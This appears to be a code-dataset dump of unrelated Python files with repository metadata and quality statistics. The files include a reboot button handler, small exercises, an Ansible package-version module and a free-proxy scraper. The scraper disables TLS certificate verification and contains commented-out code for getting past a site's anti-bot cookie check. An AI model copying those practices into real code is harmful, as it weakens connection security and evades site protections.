self.drawer.ClearCanvas()
self.drawer.WriteOnCanvas(".......Reboot.......", line=0)
self.drawer.WriteOnCanvas(" Hold Button ", line=1)
self.drawer.WriteOnCanvas(" To Reboot ", line=2)
def OnLongPress(self):
self.drawer.ClearCanvas()
cmd = "sudo reboot now"
print("REBOOT")
subprocess.Popen(cmd, shell = True) | 31.045455 | 65 | 0.610542 | 75 | 683 | 5.453333 | 0.48 | 0.171149 | 0.168704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011976 | 0.266471 | 683 | 22 | 66 | 31.045455 | 0.804391 | 0 | 0 | 0.111111 | 0 | 0 | 0.116959 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.444444 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e98c19a9f41dbb82f2ec64a837df13e0499732e | 380 | py | Python | ex018.py | Gustavo-Dev-Web/python | 88c9a51cba5290d1dcfce8ea9481ed4749503f68 | [
"MIT"
] | null | null | null | ex018.py | Gustavo-Dev-Web/python | 88c9a51cba5290d1dcfce8ea9481ed4749503f68 | [
"MIT"
] | null | null | null | ex018.py | Gustavo-Dev-Web/python | 88c9a51cba5290d1dcfce8ea9481ed4749503f68 | [
"MIT"
] | null | null | null | from math import radians, sin, cos, tan
angulo = float(input('Digite o ângulo que você deseja: '))
seno = sin(radians(angulo))
cosseno = cos(radians(angulo))
tangente = tan(radians(angulo))
print(f'O ângulo de {angulo} tem o SENO de {seno :.2f}!')
print(f'O ângulo de {angulo} tem o COSSENO de {cosseno :.2f}!')
print(f'O ângulo de {angulo} tem a TANGENTE de {tangente :.2f}!')
| 34.545455 | 65 | 0.694737 | 64 | 380 | 4.125 | 0.390625 | 0.106061 | 0.079545 | 0.147727 | 0.295455 | 0.295455 | 0.295455 | 0.295455 | 0 | 0 | 0 | 0.009288 | 0.15 | 380 | 10 | 66 | 38 | 0.80805 | 0 | 0 | 0 | 0 | 0 | 0.494737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e9b97604a5cb5368bd271887ae7d926ada9d2f3 | 685 | py | Python | LeetCode/python/061-090/086-partition-list/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/061-090/086-partition-list/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/061-090/086-partition-list/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | __author__ = 'yinjun'
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param head, a ListNode
# @param x, an integer
# @return a ListNode
def partition(self, head, x):
h1 = ListNode(0)
h2 = ListNode(0)
h1h = h1
h2h = h2
h = head
while h != None:
if h.val < x :
h1.next = ListNode(h.val)
h1 = h1.next
else:
h2.next = ListNode(h.val)
h2 = h2.next
h = h.next
h1.next = h2h.next
return h1h.next
| 18.513514 | 41 | 0.464234 | 83 | 685 | 3.73494 | 0.39759 | 0.03871 | 0.083871 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043928 | 0.435037 | 685 | 36 | 42 | 19.027778 | 0.757106 | 0.272993 | 0 | 0 | 0 | 0 | 0.01227 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e9d1f88f2018b598e87d9922395a3eec689c6a1 | 2,389 | py | Python | jasonhelper/__init__.py | jbkoh/jason_python_helper | 6a9d8e31d070b5adb827ba96887db24cb431b94e | [
"MIT"
] | null | null | null | jasonhelper/__init__.py | jbkoh/jason_python_helper | 6a9d8e31d070b5adb827ba96887db24cb431b94e | [
"MIT"
] | 1 | 2017-10-12T23:01:32.000Z | 2017-11-21T06:44:07.000Z | jasonhelper/__init__.py | jbkoh/jason_python_helper | 6a9d8e31d070b5adb827ba96887db24cb431b94e | [
"MIT"
] | 1 | 2018-09-19T15:12:57.000Z | 2018-09-19T15:12:57.000Z | import argparse
import os
import time
## Argparser
def str2slist(s):
s.replace(' ', '')
return s.split(',')
def str2ilist(s):
s.replace(' ', '')
return [int(c) for c in s.split(',')]
def str2bool(v):
if v in ['true', 'True']:
return True
elif v in ['false', 'False']:
return False
else:
assert(False)
argparser = argparse.ArgumentParser()
argparser.register('type','bool',str2bool)
argparser.register('type','slist', str2slist)
argparser.register('type','ilist', str2ilist)
# Adopted from: http://stackoverflow.com/a/8412405
def rolling_window(l, w_size):
for i in range(len(l)-w_size+1):
yield [l[i+o] for o in range(w_size)]
def striding_windows(l, w_size):
curr_idx = 0
while curr_idx < len(l):
yield l[curr_idx:curr_idx + w_size]
curr_idx += w_size
def check_and_create_dir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
# Adopted from: https://stackoverflow.com/a/21894086
class bidict(dict):
def __init__(self, *args, **kwargs):
super(bidict, self).__init__(*args, **kwargs)
self.inverse = {}
for key, value in self.items():
self.inverse.setdefault(value,[]).append(key)
def __setitem__(self, key, value):
if key in self:
self.inverse[self[key]].remove(key)
super(bidict, self).__setitem__(key, value)
self.inverse.setdefault(value,[]).append(key)
def __delitem__(self, key):
self.inverse.setdefault(self[key],[]).remove(key)
if self[key] in self.inverse and not self.inverse[self[key]]:
del self.inverse[self[key]]
super(bidict, self).__delitem__(key)
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
class FtnTimer(object):
def __init__(self):
self.tot_time = 0
self.tot_cnt = 0
self.curr_time = 0
def start(self):
self.start_time = time.clock()
def end(self):
end_time = time.clock()
self.tot_time += end_time - self.start_time
self.tot_cnt += 1
def get_result(self):
if not self.tot_cnt:
avg_time = None
else:
avg_time = self.tot_time / self.tot_cnt
res = {
'average_time': avg_time
}
return res
| 25.688172 | 69 | 0.601925 | 334 | 2,389 | 4.113772 | 0.296407 | 0.064047 | 0.029112 | 0.039301 | 0.055313 | 0.055313 | 0.055313 | 0 | 0 | 0 | 0 | 0.015792 | 0.257848 | 2,389 | 92 | 70 | 25.967391 | 0.759165 | 0.062788 | 0 | 0.085714 | 0 | 0 | 0.026906 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 1 | 0.2 | false | 0 | 0.042857 | 0 | 0.342857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e9d9a8e7ebad14756d858c92a15d00b8f0de94b | 2,983 | py | Python | data_evaluation.py | portaloffreedom/reinforcement-learning-in-rust | 470a8b6486a2c83dccbab9a0ef4bfd020e975d56 | [
"MIT"
] | null | null | null | data_evaluation.py | portaloffreedom/reinforcement-learning-in-rust | 470a8b6486a2c83dccbab9a0ef4bfd020e975d56 | [
"MIT"
] | null | null | null | data_evaluation.py | portaloffreedom/reinforcement-learning-in-rust | 470a8b6486a2c83dccbab9a0ef4bfd020e975d56 | [
"MIT"
] | null | null | null | # Download data, unzip, etc.
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import scipy.stats as st
# Set some parameters to apply to all plots. These can be overridden
# in each plot if desired
import matplotlib
# Plot size to 14" x 7"
matplotlib.rc('figure', figsize = (14, 7))
# Font size to 14
matplotlib.rc('font', size = 14)
# Do not display top and right frame lines
matplotlib.rc('axes.spines', top = False, right = False)
# Remove grid lines
matplotlib.rc('axes', grid = False)
# Set backgound color to white
matplotlib.rc('axes', facecolor = 'white')
_, ax = plt.subplots()
# Define a function for the line plot with intervals
def lineplotCI(x_data, y_data, low_CI, upper_CI, minimum, maximum, x_label, y_label, title, color, file_name):
# Create the plot object
# Plot the data, set the linewidth, color and transparency of the
# line, provide a label for the legend
ax.plot(x_data, y_data, lw = 3, color = color, alpha = 1, label = file_name)
ax.plot(x_data, minimum, lw=1, color=color, alpha=1, label='5% quantile')
ax.plot(x_data, maximum, lw=1, color=color, alpha=1, label='95% quantile')
# Shade the confidence interval
ax.fill_between(x_data, low_CI, upper_CI, color=color, alpha=0.1, label='25-75 quantile')
# Label the axes and provide a title
ax.set_title(title)
ax.set_xlabel(x_label)
ax.set_ylabel(y_label)
# Display legend
ax.legend(loc = 'best')
def add_plot(csv_name, color):
dataset = pd.read_csv(csv_name, header=None)
mean = dataset.mean(axis=0)
std = dataset.std(axis=0)
upper = mean + std
lower = mean - std
upper_quantile = dataset.quantile(0.75)
median = dataset.quantile(0.5)
lower_quantile = dataset.quantile(0.25)
max_quantile = dataset.quantile(0.95)
min_quantile = dataset.quantile(0.05)
lower_interval, upper_interval = st.t.interval(0.95, 99, loc=mean, scale=std)
# Call the function to create plot
# lineplotCI(x_data = list(range(0, 400))
# , y_data = median
# , low_CI=lower_quantile
# , upper_CI=upper_quantile
# , minimum = min_quantile
# , maximum = max_quantile
# , x_label='Episodes'
# , y_label='Value of Policy'
# , title='Value of policy over time'
# , color=color)
lineplotCI(x_data=list(range(0, 400))
, y_data=mean
, low_CI=lower
, upper_CI=upper
, minimum=min_quantile
, maximum=max_quantile
, x_label='Episodes'
, y_label='Value of Policy'
, title='Value of policy over time'
, file_name=csv_name
, color=color)
# add_plot("q_learning_epsilon_rewards.csv", '#539caf')
add_plot("q_learning_epsilon_rewards.csv", '#999111')
add_plot("double_q_epsilon_rewards.csv", '#990a11')
plt.show() | 33.516854 | 111 | 0.638284 | 430 | 2,983 | 4.27907 | 0.327907 | 0.019022 | 0.043478 | 0.052174 | 0.229891 | 0.201087 | 0.201087 | 0.13913 | 0.13913 | 0.103261 | 0 | 0.03048 | 0.252095 | 2,983 | 89 | 112 | 33.516854 | 0.794263 | 0.315454 | 0 | 0 | 0 | 0 | 0.096822 | 0.028798 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.108696 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea223055e4d3fcfd6d5415328c4b3e36324649c | 3,988 | py | Python | roles/openshift_health_checker/library/rpm_version.py | KoteikinyDrova/openshift-ansible | 3db2bb10c0ad5e7ed702bfccdec03562533e8539 | [
"Apache-2.0"
] | 1 | 2019-03-13T10:14:35.000Z | 2019-03-13T10:14:35.000Z | roles/openshift_health_checker/library/rpm_version.py | KoteikinyDrova/openshift-ansible | 3db2bb10c0ad5e7ed702bfccdec03562533e8539 | [
"Apache-2.0"
] | 1 | 2021-09-23T23:36:29.000Z | 2021-09-23T23:36:29.000Z | roles/openshift_health_checker/library/rpm_version.py | KoteikinyDrova/openshift-ansible | 3db2bb10c0ad5e7ed702bfccdec03562533e8539 | [
"Apache-2.0"
] | 4 | 2018-10-27T00:29:24.000Z | 2022-01-07T07:39:51.000Z | #!/usr/bin/python
"""
Ansible module for rpm-based systems determining existing package version information in a host.
"""
from ansible.module_utils.basic import AnsibleModule
IMPORT_EXCEPTION = None
try:
import rpm # pylint: disable=import-error
except ImportError as err:
IMPORT_EXCEPTION = err # in tox test env, rpm import fails
class RpmVersionException(Exception):
"""Base exception class for package version problems"""
def __init__(self, message, problem_pkgs=None):
Exception.__init__(self, message)
self.problem_pkgs = problem_pkgs
def main():
"""Entrypoint for this Ansible module"""
module = AnsibleModule(
argument_spec=dict(
package_list=dict(type="list", required=True),
),
supports_check_mode=True
)
if IMPORT_EXCEPTION:
module.fail_json(msg="rpm_version module could not import rpm: %s" % IMPORT_EXCEPTION)
# determine the packages we will look for
pkg_list = module.params['package_list']
if not pkg_list:
module.fail_json(msg="package_list must not be empty")
# get list of packages available and complain if any
# of them are missing or if any errors occur
try:
pkg_versions = _retrieve_expected_pkg_versions(_to_dict(pkg_list))
_check_pkg_versions(pkg_versions, _to_dict(pkg_list))
except RpmVersionException as excinfo:
module.fail_json(msg=str(excinfo))
module.exit_json(changed=False)
def _to_dict(pkg_list):
return {pkg["name"]: pkg for pkg in pkg_list}
def _retrieve_expected_pkg_versions(expected_pkgs_dict):
"""Search for installed packages matching given pkg names
and versions. Returns a dictionary: {pkg_name: [versions]}"""
transaction = rpm.TransactionSet()
pkgs = {}
for pkg_name in expected_pkgs_dict:
matched_pkgs = transaction.dbMatch("name", pkg_name)
if not matched_pkgs:
continue
for header in matched_pkgs:
if header['name'] == pkg_name:
if pkg_name not in pkgs:
pkgs[pkg_name] = []
pkgs[pkg_name].append(header['version'])
return pkgs
def _check_pkg_versions(found_pkgs_dict, expected_pkgs_dict):
invalid_pkg_versions = {}
not_found_pkgs = []
for pkg_name, pkg in expected_pkgs_dict.items():
if not found_pkgs_dict.get(pkg_name):
not_found_pkgs.append(pkg_name)
continue
found_versions = [_parse_version(version) for version in found_pkgs_dict[pkg_name]]
expected_version = _parse_version(pkg["version"])
if expected_version not in found_versions:
invalid_pkg_versions[pkg_name] = {
"found_versions": found_versions,
"required_version": expected_version,
}
if not_found_pkgs:
raise RpmVersionException(
'\n'.join([
"The following packages were not found to be installed: {}".format('\n '.join([
"{}".format(pkg)
for pkg in not_found_pkgs
]))
]),
not_found_pkgs,
)
if invalid_pkg_versions:
raise RpmVersionException(
'\n '.join([
"The following packages were found to be installed with an incorrect version: {}".format('\n'.join([
" \n{}\n Required version: {}\n Found versions: {}".format(
pkg_name,
pkg["required_version"],
', '.join([version for version in pkg["found_versions"]]))
for pkg_name, pkg in invalid_pkg_versions.items()
]))
]),
invalid_pkg_versions,
)
def _parse_version(version_str):
segs = version_str.split('.')
if not segs or len(segs) <= 2:
return version_str
return '.'.join(segs[0:2])
if __name__ == '__main__':
main()
| 31.15625 | 116 | 0.621364 | 476 | 3,988 | 4.926471 | 0.277311 | 0.044776 | 0.030704 | 0.021748 | 0.078465 | 0.065672 | 0.045203 | 0.045203 | 0 | 0 | 0 | 0.001054 | 0.286108 | 3,988 | 127 | 117 | 31.401575 | 0.82262 | 0.127633 | 0 | 0.137931 | 0 | 0 | 0.115753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.08046 | 0.011494 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea5524aaaf6020d2fb120959b8bb005d31ffdc3 | 12,967 | py | Python | spider_proxy/app/managers/proxy_fetch.py | seniortesting/python-spider | 0b70817373e2e22267ddf3b80b9b7eb15931e41e | [
"MIT"
] | null | null | null | spider_proxy/app/managers/proxy_fetch.py | seniortesting/python-spider | 0b70817373e2e22267ddf3b80b9b7eb15931e41e | [
"MIT"
] | null | null | null | spider_proxy/app/managers/proxy_fetch.py | seniortesting/python-spider | 0b70817373e2e22267ddf3b80b9b7eb15931e41e | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import logging
import re
from time import sleep
import requests
import urllib3
from app.utils.spider_utils import getHtmlTree, verifyProxyFormat
from app.utils.web_request import WebRequest
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s.%(msecs).03d - %(filename)s:%(lineno)d %(levelname)s]: %(message)s')
log = logging.getLogger(__name__)
class FetchFreeProxy(object):
@staticmethod
def ip66(count=20):
"""
代理66 http://www.66ip.cn/
:param count: 提取数量
:return:
"""
urls = [
"http://www.66ip.cn/nmtq.php?getnum=60&isp=0&anonymoustype=0&start=&ports=&export=&ipaddress=&area=1&proxytype=2&api=66ip"
]
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
'Accept': '*/*',
'Connection': 'keep-alive',
'Accept-Language': 'zh-CN,zh;q=0.8'}
try:
import js2py
session = requests.Session()
session.verify = False
# -----------------------------2019-08-16 最早期版本
# src = session.get("http://www.66ip.cn/", headers=headers).text
#
# src = src.split("</script>")[0] + '}'
# src = src.replace("<script>", "function test() {")
# src = src.replace("while(z++)try{eval(", ';var num=10;while(z++)try{var tmp=')
# src = src.replace(");break}", ";num--;if(tmp.search('cookie') != -1 | num<0){return tmp}}")
# ctx = js2py.eval_js(src)
# src = ctx.test()
# src = src[src.find("document.cookie="): src.find("};if((")]
# src = src.replace("document.cookie=", "")
# src = "function test() {var window={}; return %s }" % src
# cookie = js2py.eval_js(src).test()
# js_cookie = cookie.split(";")[0].split("=")[-1]
# -----------------------------2019-08-16 更新版本需要破解cookies
# content = ''.join(re.findall('<script>(.*?)</script>', content))
# function_js = content.replace('eval', 'return')
# function_content = "function getClearance(){" + function_js + "};"
# self.context.execute(function_content)
# # 一级解密结果
# decoded_result = self.context.getClearance()
# function_js_result = 'var a' + decoded_result.split('document.cookie')[1].split("Path=/;'")[
# 0] + "Path=/;';return a;"
# # s = re.sub(r'document.create.*?firstChild.href', '"{}"'.format(self.start_url), s)
# function_content_result = "function getClearanceResult(){" + function_js_result + "};"
# self.context.execute(function_content_result)
# # 二次解密结果
# decoded_content = self.context.getClearanceResult()
# jsl_clearance = decoded_content.split(';')[0]
except Exception as e:
print(e)
return
for url in urls:
try:
# cookies={"__jsl_clearance": js_cookie}
html = session.get(url.format(count), headers=headers).text
ips = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}", html)
for ip in ips:
yield ip.strip()
except Exception as e:
print(e)
pass
@staticmethod
def goubanjia():
"""
guobanjia http://www.goubanjia.com/
:return:
"""
url = "http://www.goubanjia.com/"
tree = getHtmlTree(url)
proxy_list = tree.xpath('//td[@class="ip"]')
# 此网站有隐藏的数字干扰,或抓取到多余的数字或.符号
# 需要过滤掉<p style="display:none;">的内容
xpath_str = """.//*[not(contains(@style, 'display: none'))
and not(contains(@style, 'display:none'))
and not(contains(@class, 'port'))
]/text()
"""
for each_proxy in proxy_list:
try:
# :符号裸放在td下,其他放在div span p中,先分割找出ip,再找port
ip_addr = ''.join(each_proxy.xpath(xpath_str))
# HTML中的port是随机数,真正的端口编码在class后面的字母中。
# 比如这个:
# <span class="port CFACE">9054</span>
# CFACE解码后对应的是3128。
port = 0
for _ in each_proxy.xpath(".//span[contains(@class, 'port')]"
"/attribute::class")[0]. \
replace("port ", ""):
port *= 10
port += (ord(_) - ord('A'))
port /= 8
yield '{}:{}'.format(ip_addr, int(port))
except Exception as e:
pass
@staticmethod
def kuaidaili():
"""
快代理 https://www.kuaidaili.com
"""
url_list = [
'https://www.kuaidaili.com/free/inha/',
'https://www.kuaidaili.com/free/intr/'
]
for url in url_list:
tree = getHtmlTree(url)
proxy_list = tree.xpath('.//table//tr')
sleep(1) # 必须sleep 不然第二条请求不到数据
for tr in proxy_list[1:]:
yield ':'.join(tr.xpath('./td/text()')[0:2])
@staticmethod
def coderbusy():
"""
码农代理 https://proxy.coderbusy.com/
:return:
"""
urls = ['https://proxy.coderbusy.com/']
for url in urls:
tree = getHtmlTree(url)
proxy_list = tree.xpath('.//table//tr')
for tr in proxy_list[1:]:
tr_data=tr.xpath('./td/text()')
ip_port=tr_data[0:2]
location=tr_data[-1].strip()
if location in ['腾讯云','阿里云','移动','联通','电信', '世纪互联']: yield ':'.join(ip_port)
# yield ':'.join(tr.xpath('./td/text()')[0:2])
@staticmethod
def ip3366():
"""
云代理 http://www.ip3366.net/free/
:return:
"""
urls = ['http://www.ip3366.net/free/?stype=1',
"http://www.ip3366.net/free/?stype=2"
]
request = WebRequest()
for url in urls:
r = request.get(url, timeout=10)
proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
for proxy in proxies:
yield ":".join(proxy)
@staticmethod
def jiangxianli(page_count=2):
"""
http://ip.jiangxianli.com/?page=
免费代理库
:return:
"""
for i in range(1, page_count + 1):
url = 'http://ip.jiangxianli.com/?page={}'.format(i)
html_tree = getHtmlTree(url)
tr_list = html_tree.xpath("/html/body/div[1]/div/div[1]/div[2]/table/tbody/tr")
if len(tr_list) == 0:
continue
for tr in tr_list:
yield tr.xpath("./td[2]/text()")[0] + ":" + tr.xpath("./td[3]/text()")[0]
@staticmethod
def data5u():
'''
无忧代理,免费10个
:return:
'''
url_list = [
'http://www.data5u.com/',
]
for url in url_list:
html_tree = getHtmlTree(url)
ul_list = html_tree.xpath('//ul[@class="l2"]')
for ul in ul_list:
try:
yield ':'.join(ul.xpath('.//li/text()')[0:2])
except Exception as e:
print(e)
@staticmethod
def xicidaili(page_count=1):
url_list = [
'http://www.xicidaili.com/nn/', # 高匿
]
for each_url in url_list:
for i in range(1, page_count + 1):
page_url = each_url + str(i)
tree = getHtmlTree(page_url)
proxy_list = tree.xpath('.//table[@id="ip_list"]//tr[position()>1]')
for proxy in proxy_list:
try:
yield ':'.join(proxy.xpath('./td/text()')[0:2])
except Exception as e:
pass
# @staticmethod
# def proxylistplus():
# urls = ['https://list.proxylistplus.com/Fresh-HTTP-Proxy-List-1']
# request = WebRequest()
# for url in urls:
# r = request.get(url)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
# @staticmethod
# def iphai():
# """
# IP海 http://www.iphai.com/free/ng
# :return:
# """
# urls = [
# 'http://www.iphai.com/free/ng',
# 'http://www.iphai.com/free/np',
# 'http://www.iphai.com/free/wg',
# 'http://www.iphai.com/free/wp'
# ]
# request = WebRequest()
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r'<td>\s*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*?</td>[\s\S]*?<td>\s*?(\d+)\s*?</td>',
# r.text)
# for proxy in proxies:
# yield ":".join(proxy)
# @staticmethod
# def ip181(days=1):
# url = 'http://www.ip181.com/'
# html_tree = getHtmlTree(url)
# try:
# tr_list = html_tree.xpath('//tr')[1:]
# for tr in tr_list:
# yield ':'.join(tr.xpath('./td/text()')[0:2])
# except Exception as e:
# pass
# @staticmethod
# def mimiip():
# url_gngao = ['http://www.mimiip.com/gngao/%s' % n for n in range(1, 10)] # 国内高匿
# url_gnpu = ['http://www.mimiip.com/gnpu/%s' % n for n in range(1, 10)] # 国内普匿
# url_gntou = ['http://www.mimiip.com/gntou/%s' % n for n in range(1, 10)] # 国内透明
# url_list = url_gngao + url_gnpu + url_gntou
#
# request = WebRequest()
# for url in url_list:
# r = request.get(url)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\w\W].*<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
# @staticmethod
# def xundaili():
# '''
# 讯代理
# :return:
# '''
# url = 'http://www.xdaili.cn/ipagent/freeip/getFreeIps?page=1&rows=10'
# request = WebRequest()
# try:
# res = request.get(url).json()
# for row in res['RESULT']['rows']:
# yield '{}:{}'.format(row['ip'], row['port'])
# except Exception as e:
# pass
# @staticmethod
# def cnproxy():
# urls = ['http://cn-proxy.com/', 'http://cn-proxy.com/archives/218']
# request = WebRequest()
# for url in urls:
# r = request.get(url)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\w\W]<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
# @staticmethod
# def proxylist():
# urls = ['https://proxy-list.org/english/index.php?p=%s' % n for n in range(1, 10)]
# request = WebRequest()
# import base64
# for url in urls:
# r = request.get(url)
# proxies = re.findall(r"Proxy\('(.*?)'\)", r.text)
# for proxy in proxies:
# yield base64.b64decode(proxy).decode()
def checkAllProxy():
"""
检查getFreeProxy所有代理获取函数运行情况
Returns:
None
"""
import inspect
member_list = inspect.getmembers(FetchFreeProxy, predicate=inspect.isfunction)
proxy_count_dict = dict()
for func_name, func in member_list:
log.debug(u"开始运行代理: {}".format(func_name))
try:
proxy_list = [_ for _ in func() if verifyProxyFormat(_)]
proxy_count_dict[func_name] = len(proxy_list)
except Exception as e:
log.error(u"代理获取函数 {} 运行出错!".format(func_name))
log.error(str(e))
log.info(u"所有函数运行完毕 " + "***" * 5)
for func_name, func in member_list:
log.debug(u"函数: {n}, 获取到代理数: {c}".format(n=func_name, c=proxy_count_dict.get(func_name, 0)))
def checkSingleProxy(func):
"""
检查指定的FetchFreeProxy某个function运行情况
Args:
func: FetchFreeProxy中某个可调用方法
Returns:
None
"""
func_name = getattr(func, '__name__', "None")
log.info("start running func: {}".format(func_name))
count = 0
for proxy in func():
if verifyProxyFormat(proxy):
log.debug("{} fetch proxy: {}".format(func_name, proxy))
count += 1
log.debug("{n} completed, fetch proxy number: {c}".format(n=func_name, c=count))
if __name__ == '__main__':
# proxylistplus(FetchFreeProxy.proxylistplus)
print(checkSingleProxy(FetchFreeProxy.coderbusy))
| 36.94302 | 134 | 0.488162 | 1,477 | 12,967 | 4.199729 | 0.215978 | 0.008061 | 0.011607 | 0.012252 | 0.34048 | 0.270031 | 0.226342 | 0.212317 | 0.168467 | 0.154603 | 0 | 0.027294 | 0.336007 | 12,967 | 350 | 135 | 37.048571 | 0.693148 | 0.390376 | 0 | 0.297468 | 0 | 0.037975 | 0.19589 | 0.039632 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063291 | false | 0.018987 | 0.056962 | 0 | 0.132911 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea66006c86aaaba9532a364fe87531b05105008 | 1,384 | py | Python | Mundo 3/File 105.py | PedroHenriqueSimoes/Exercicios-Python | 702a819d508dd7878b88fb676559d899237ac761 | [
"MIT"
] | 1 | 2020-04-30T21:32:01.000Z | 2020-04-30T21:32:01.000Z | Mundo 3/File 105.py | PedroHenriqueSimoes/Exercicios-Python | 702a819d508dd7878b88fb676559d899237ac761 | [
"MIT"
] | 1 | 2021-10-05T02:00:04.000Z | 2021-10-05T02:00:04.000Z | Mundo 3/File 105.py | PedroHenriqueSimoes/Exercicios-Python | 702a819d508dd7878b88fb676559d899237ac761 | [
"MIT"
] | null | null | null | def notas(*n, show=False):
"""
-> Função que lê varias notas e retorna um dicionario com dados
:param n: Lê varias notas (numero indefinido)
:param show: Mostra a situação do aluno (opc)
:return: Retorna um dicionario
"""
dados = dict()
dados['total'] = len(n)
dados['maior'] = max(n)
dados['menor'] = min(n)
dados['media'] = sum(n)/dados['total']
if show:
if dados['media'] >= 7:
dados['situação'] = 'BOA !'
elif 7 > dados['media'] > 5:
dados['situação'] = 'RAZOAVEL !'
elif dados['media'] <= 5:
dados['situaçãos'] = 'RUIM !'
return dados
user = list()
t = bool()
while True:
user.append(float(input('Informe uma nota: ')))
resp = ' '
while resp not in 'SsNn':
resp = (str(input('Deseja continuar: [S/N] '))).strip()[0]
if resp in 'Ss':
break
if resp in 'Nn':
break
print('\033[31m:<errozin>: Informe apenas os valores S ou N !\033[m')
if resp in 'Nn':
break
most = ' '
while most not in 'SsNn':
most = (str(input('Deseja mostra a situação? [S/N] '))).strip()[0]
if most in 'Ss':
t = True
break
elif most in 'Nn':
t = False
break
print('\033[31m:<errozin>: Informe apenas os valores S ou N ! \033[m')
tot = (notas(user, show=t))
print(tot)
